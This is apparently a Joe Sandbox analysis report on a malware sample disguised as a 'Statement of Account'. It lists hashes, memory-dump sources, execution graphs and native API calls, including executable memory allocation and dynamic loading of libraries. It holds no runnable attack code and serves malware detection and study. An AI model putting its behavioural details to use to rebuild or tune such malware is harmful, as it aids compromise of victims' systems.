• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07A38C5D
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 013FB01E
Memory Dump Source
• Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07A38C5D
Memory Dump Source
• Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4899895b49fc9ef9d622cfdf72056805fdfd09550bb2465b5edc11123e87ed33
                                                                                                                                                  • Instruction ID: e8b5bb61ccb0c8748eb56fce8f76ea7401d6b1d852428a02cdfaa43f29859a6b
                                                                                                                                                  • Opcode Fuzzy Hash: 4899895b49fc9ef9d622cfdf72056805fdfd09550bb2465b5edc11123e87ed33
                                                                                                                                                  • Instruction Fuzzy Hash: 072148B1504304DFDB01EF58D9C0B56BF65FB94328F20C56CD90A1B296C736E416C7A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6a489e7c4e71b72ce973605d0158c74a85c7e7782386114b25a13368146e4752
                                                                                                                                                  • Instruction ID: 7563717675db1510b550f3285c3154f1fda7970405b2176985e0f22de878ce27
                                                                                                                                                  • Opcode Fuzzy Hash: 6a489e7c4e71b72ce973605d0158c74a85c7e7782386114b25a13368146e4752
                                                                                                                                                  • Instruction Fuzzy Hash: B721F1B1504344EFDB05EF58D9C0B26BF65FB88328F24C56AE90A0B696C336D416CAB1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 92c530ae9c8984d18ad1064a92e21026b61d4f2529c812090aa8addff9d1b1cb
                                                                                                                                                  • Instruction ID: 18a8bfb844812836e36c2700f7fbf1badd01dd081c149e0d095022b351ced498
                                                                                                                                                  • Opcode Fuzzy Hash: 92c530ae9c8984d18ad1064a92e21026b61d4f2529c812090aa8addff9d1b1cb
                                                                                                                                                  • Instruction Fuzzy Hash: 35210071604204DFDF15DF68D885B26BBA5FB84358F20CA6DD80A0B386C33AD807CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cfb581740620567a8f65e2e9ebf274069c23f343b24d59295cc087671c7d87d4
                                                                                                                                                  • Instruction ID: 0318d7a08b52e9be394970cfdad86ff97a777ed7afbbb2eb50f7edd136c13a2a
                                                                                                                                                  • Opcode Fuzzy Hash: cfb581740620567a8f65e2e9ebf274069c23f343b24d59295cc087671c7d87d4
                                                                                                                                                  • Instruction Fuzzy Hash: 6C21F5B5604204EFDF05DF98D9C5B25BBA5FB84328F24C6ADD94A4B392C336D406CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction ID: 11189ade2e4f0a57d3bd42ba8ccaa8d7a9e0d9e80243021cac5285dae29800e4
                                                                                                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction Fuzzy Hash: 4E11E176504380CFCB02DF54D5C4B16BF72FB84328F24C6AAD8090B696C336D45ACBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729439593.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_138d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction ID: dc7bf70595c95c456f849d93ad547c85f32cab151a5260809b8cebc97143736d
                                                                                                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                  • Instruction Fuzzy Hash: E011DF76504340DFDB02DF48D5C4B56BF72FB84324F24C2A9D9090B296C33AE45ACBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction ID: 4816f4c638177645ac744a736ab7c0b60d2cf517d2ada2d05d64a7370e28ea50
                                                                                                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction Fuzzy Hash: 3411BB75904280DFDB02CF58C5C4B15BBB2FB84228F24C6ADD8894B296C33AD40ACB61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction ID: 881c61dc1eb2bf2cea9c27e73e052e5ceeca2b9fb8421044a5800dc083a393ad
                                                                                                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction Fuzzy Hash: 2D118E75504280DFDB16CF58D5C4B15BB62FB44318F24C6A9D84A4B756C33AD44ACB61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83a2ff3c0612da2ad6852a482354b72799a1bdaad3d74fe1ebc10070e245456f
                                                                                                                                                  • Instruction ID: fff676c7f4afde90a6b807a349fccf1d5fbb29c790c0e36eafde5b6313ead2ea
                                                                                                                                                  • Opcode Fuzzy Hash: 83a2ff3c0612da2ad6852a482354b72799a1bdaad3d74fe1ebc10070e245456f
                                                                                                                                                  • Instruction Fuzzy Hash: 42D1BAB17006168FDB15DFB9C510BAEB7F6AF89304F1484ADE1AA9B390CB34E901CB51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d1d5b2a56539ad2c931e2c72af7e3e2b4991a546760b8841952a72fb4267f0a
                                                                                                                                                  • Instruction ID: 6ee8d9ab36256071d87e8a91dc51c9363e30a8c8d477032195d349d6f661770b
                                                                                                                                                  • Opcode Fuzzy Hash: 3d1d5b2a56539ad2c931e2c72af7e3e2b4991a546760b8841952a72fb4267f0a
                                                                                                                                                  • Instruction Fuzzy Hash: 52E1E9B4E011198FCB14DFA9C590AAEFBB2FF89304F248169E815AB355D731AD45CFA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7f42bc5eeaad18a5de0745471d378d5522f298e463786f98a31a398828501307
                                                                                                                                                  • Instruction ID: 5b3df7fecb334cb05a52d75e1e1fb8107f1bfc98bcd42b4e2dcf1d95783be9dd
                                                                                                                                                  • Opcode Fuzzy Hash: 7f42bc5eeaad18a5de0745471d378d5522f298e463786f98a31a398828501307
                                                                                                                                                  • Instruction Fuzzy Hash: 2CE10AB4E002598FCB14DFA9C5909AEFBB2FF89305F248169E414AB356D730AD41CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7bac675e064ba67ce541370594af28123bbc04c38d06a0f0ee58b44e5b52cd95
                                                                                                                                                  • Instruction ID: cde1c2da7e355488414bb0f73f252ee23eca97a746a733665fd2be25b7741109
                                                                                                                                                  • Opcode Fuzzy Hash: 7bac675e064ba67ce541370594af28123bbc04c38d06a0f0ee58b44e5b52cd95
                                                                                                                                                  • Instruction Fuzzy Hash: 06E1FCB4E012198FDB14DFA9C590AAEFBF2FF89304F248169E415AB355D730A941CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0ec88d8f759afcb66bc5b252f05caf952317b3a8aa9e541f5932e5546a404c64
                                                                                                                                                  • Instruction ID: 170d43e1279ac7d9937226995fbcc74a40dfbe375f372549a59f0f951edc55d1
                                                                                                                                                  • Opcode Fuzzy Hash: 0ec88d8f759afcb66bc5b252f05caf952317b3a8aa9e541f5932e5546a404c64
                                                                                                                                                  • Instruction Fuzzy Hash: E2E1F8B4E051198FCB14DFA9C5909AEFBF2FF89304F248169E815AB355D730A985CFA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5dc9296b1bb47749c4ac73d4ba8fe53eac611b326024457561711d8e1d6cfbe
                                                                                                                                                  • Instruction ID: 389239e0fe9df7d072f33fb8ffd3bdae247480cff16f417ee634de2c1223f49e
                                                                                                                                                  • Opcode Fuzzy Hash: b5dc9296b1bb47749c4ac73d4ba8fe53eac611b326024457561711d8e1d6cfbe
                                                                                                                                                  • Instruction Fuzzy Hash: D4E1E9B4E016198FCB14DFA9C5909AEFBF2FF89304F248169E415AB355D731A942CFA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 907edde47c0c3d4ae61e44bdb2baba7722268e4b30a732832df60b3aa9a2bef0
                                                                                                                                                  • Instruction ID: d93a12e466776e000fabe56b6f86e8bef38c9250e3c12db0423c5365c8f01698
                                                                                                                                                  • Opcode Fuzzy Hash: 907edde47c0c3d4ae61e44bdb2baba7722268e4b30a732832df60b3aa9a2bef0
                                                                                                                                                  • Instruction Fuzzy Hash: 3EA17136E0021ACFCF15DFB8C84499EBBB6FF85304B15456EEA05AB265DB31E915CB80

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                  Total number of Nodes:548
                                                                                                                                                  Total number of Limit Nodes:69
                                                                                                                                                   execution_graph: node/edge dump of the 548-node graph, flattened to text (the rendered graph itself does not survive extraction). What the node labels record:
                                                                                                                                                   • Root node 41f080; all other function addresses lie in 405f60-41cf90 of the same image as the control-flow graphs below (hcaresult_6_2_400000_vbc.jbxd).
                                                                                                                                                   • APIs named on nodes: ExitProcess, LdrInitializeThunk, LdrLoadDll, LookupPrivilegeValueW, NtAllocateVirtualMemory, NtClose, NtCreateFile, NtReadFile, PostThreadMessageW, RtlAllocateHeap, RtlFreeHeap.
                                                                                                                                                   • Each small wrapper in 419de0-41a7d0 (41a320 NtCreateFile, 41a3d0 NtReadFile, 41a450 NtClose, 41a500 NtAllocateVirtualMemory, 41a5f0 RtlAllocateHeap, 41a630 RtlFreeHeap, 41a670 ExitProcess, 41a790 LookupPrivilegeValueW) passes through 41af20 (LdrLoadDll) before reaching its API node, consistent with run-time resolution of these imports.
                                                                                                                                                   • Nodes 5c82ad0-5c82fb0, outside the 0x400000 image, are all labelled LdrInitializeThunk and are reached from the wrappers 419de0, 419e50, 419e80, 419ec0, 419f80, 419fd0, 41a020, 41a1e0, 41a220, 41a4c0, 41a540 and 41a580.
                                                                                                                                                   • Collapsed callees carry a count instead of names: 4087a0 (19 API calls), 4083a0 (11), 40f700 (10), 414a40 (8), 407ea0 (4), 40f490 and 414060 (3), 408160, 419de0, 419e80, 419ec0, 419fd0, 41a450, 41a4c0, 41a580, 41bd00, 41bd80, 41bf50 and 41cef0 (2 each).

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID: !JA$bMA$bMA
                                                                                                                                                  • API String ID: 2738559852-4222312340
                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   control_flow_graph (function 40ace0; basic blocks as id: address range, then edges)
                                                                                                                                                   • 252: 40ace0-40ad09, call 41cc10
                                                                                                                                                   • 255: 40ad0b-40ad0e
                                                                                                                                                   • 256: 40ad0f-40ad1d, call 41d030
                                                                                                                                                   • 259: 40ad2d-40ad3e, call 41b460
                                                                                                                                                   • 260: 40ad1f-40ad2a, call 41d2b0
                                                                                                                                                   • 265: 40ad40-40ad54, LdrLoadDll
                                                                                                                                                   • 266: 40ad57-40ad5a
                                                                                                                                                   • Edges: 252->255, 252->256, 256->259, 256->260, 259->265, 259->266, 260->259, 265->266
                                                                                                                                                  APIs
                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                  • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                  • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
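The execution graph above and the `APIs` bullet lines of the control-flow graphs in this report are printed as flattened text, which makes them awkward to triage by eye. The following script is an added example, not Joe Sandbox code and not part of the report: it parses the `execution_graph` node/edge list and the `Name.MODULE(args), ref: addr` bullet lines, then answers "which native APIs does the function at address X eventually reach?" and lists the Nt*/Zw* calls made straight into NTDLL. The sample text is copied from this report but abridged, so reachability only reflects the edges that were kept; the regexes assume this export's format (5-digit node ids, `•` bullets), which is an assumption about the text, not a documented Joe Sandbox schema.

```python
"""Triage helpers for the text export of this Joe Sandbox report.

Added example; it is not Joe Sandbox code and not part of the report. It
parses two fragments the report prints as flattened text: the
`execution_graph` node/edge list and the `APIs` bullet lines of each
control-flow graph, then answers "which native APIs does function X
reach?". The sample text below is copied from this report but abridged,
so reachability only reflects the edges that were kept.
"""
import re
from collections import defaultdict, deque

# Abridged excerpt of the execution_graph dump (tokens copied from the report).
GRAPH_TEXT = (
    "execution_graph 96280 41f080 96281 41f08b 96280->96281 96283 41b930 "
    "96280->96283 96290 41b983 96288 41b975 96335 41a670 96288->96335 "
    "96290->96281 96336 41af20 LdrLoadDll 96335->96336 96337 41a68f "
    "ExitProcess 96336->96337 96337->96290 96313 40c338 96314 41bd80 "
    "2 API calls 96313->96314 96472 41a320 96473 41a33c NtCreateFile "
    "96472->96473 96474 41af20 LdrLoadDll 96472->96474 96473->96414 "
    "96474->96473"
)

# Three `APIs` bullet lines copied from the control-flow graphs in the report.
API_LINES = [
    "• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,"
    "5EB65239,00414D62,?,00000000), ref: 0041A415",
    "• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52",
    "• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,"
    "FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), "
    "ref: 0041A36D",
]

NODE_ID = re.compile(r"\d{5}")                 # node ids are 5-digit decimals
EDGE = re.compile(r"(\d{5})->(\d{5})")
API_NAME = re.compile(r"[A-Z][A-Za-z0-9]+")    # e.g. NtCreateFile, LdrLoadDll
SUMMARY = re.compile(r"(\d+) API calls")       # collapsed callee, count only
API_LINE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, label), edges id -> set(ids)."""
    nodes, edges, labels = {}, defaultdict(set), defaultdict(list)
    tokens = text.split()
    current = None
    i = 1 if tokens and tokens[0] == "execution_graph" else 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.fullmatch(tok)
        if m:
            edges[m.group(1)].add(m.group(2))
        elif NODE_ID.fullmatch(tok) and i + 1 < len(tokens):
            current = tok
            nodes[current] = tokens[i + 1]      # the address follows the id
            i += 1
        elif current is not None:
            labels[current].append(tok)         # API name or "N API calls" text
        i += 1
    return {n: (addr, " ".join(labels[n])) for n, addr in nodes.items()}, edges


def apis_in_label(label):
    """Named APIs on a node; an 'N API calls' summary contributes no names."""
    if SUMMARY.fullmatch(label):
        return set()
    return {t for t in label.split() if API_NAME.fullmatch(t)}


def summarised_call_count(label):
    """Count from a collapsed 'N API calls' label, or None for a named label."""
    m = SUMMARY.fullmatch(label)
    return int(m.group(1)) if m else None


def node_for_address(nodes, address):
    for node_id, (addr, _) in nodes.items():
        if addr.lower() == address.lower():
            return node_id
    return None


def reachable_apis(nodes, edges, start):
    """Breadth-first walk from `start`, collecting API names on visited nodes."""
    seen, queue, found = {start}, deque([start]), set()
    while queue:
        node = queue.popleft()
        if node in nodes:
            found |= apis_in_label(nodes[node][1])
        for nxt in edges.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return found


def parse_api_line(line):
    """Parse '• Name.MODULE(args), ref: addr' into a dict, or None."""
    m = API_LINE.search(line)
    if not m:
        return None
    name, module, args, ref = m.groups()
    return {"api": name, "module": module,
            "args": [a.strip() for a in args.split(",")], "ref": int(ref, 16)}


def native_ntdll_calls(lines):
    """Nt*/Zw* calls made straight into NTDLL, i.e. user code skipping kernel32."""
    calls = (parse_api_line(line) for line in lines)
    return sorted({c["api"] for c in calls
                   if c and c["module"].upper() == "NTDLL"
                   and c["api"].startswith(("Nt", "Zw"))})


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_TEXT)
    start = node_for_address(nodes, "41a670")
    print("41a670 reaches:", sorted(reachable_apis(nodes, edges, start)))
    print("native NTDLL calls in CFG API lines:", native_ntdll_calls(API_LINES))
```

Run against the full dump, `reachable_apis` from the root node 41f080 gives the complete set of native APIs the injected code can hit, and `native_ntdll_calls` over all `APIs` lines shows how much of the file and memory handling goes to ntdll directly rather than through the Win32 layer, which is the pattern the `LdrLoadDll` nodes in front of every wrapper already hint at.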

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 267 41a31b-41a371 call 41af20 NtCreateFile
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 8f3e8a6209b4b00c98ddcbbd338c2fca887c2b184796bbc1a5fb50fcfb101bb5
                                                                                                                                                  • Instruction ID: 6af5a2f632afc800a517bcec4ba0904026498e808f2fa26a1e036ec25215fe71
                                                                                                                                                  • Opcode Fuzzy Hash: 8f3e8a6209b4b00c98ddcbbd338c2fca887c2b184796bbc1a5fb50fcfb101bb5
                                                                                                                                                  • Instruction Fuzzy Hash: 9601DDB2201208BFCB08CF98D895EEB77A9BF8C354F118209BA0993241C630E8118BA4

Control-flow Graph
control_flow_graph 270 41a320-41a336 271 41a33c-41a371 NtCreateFile 270->271 272 41a337 call 41af20 270->272 272->271
APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
Memory Dump Source
• Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Control-flow Graph
control_flow_graph 273 41a500-41a516 274 41a51c-41a53d NtAllocateVirtualMemory 273->274 275 41a517 call 41af20 273->275 275->274
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Control-flow Graph
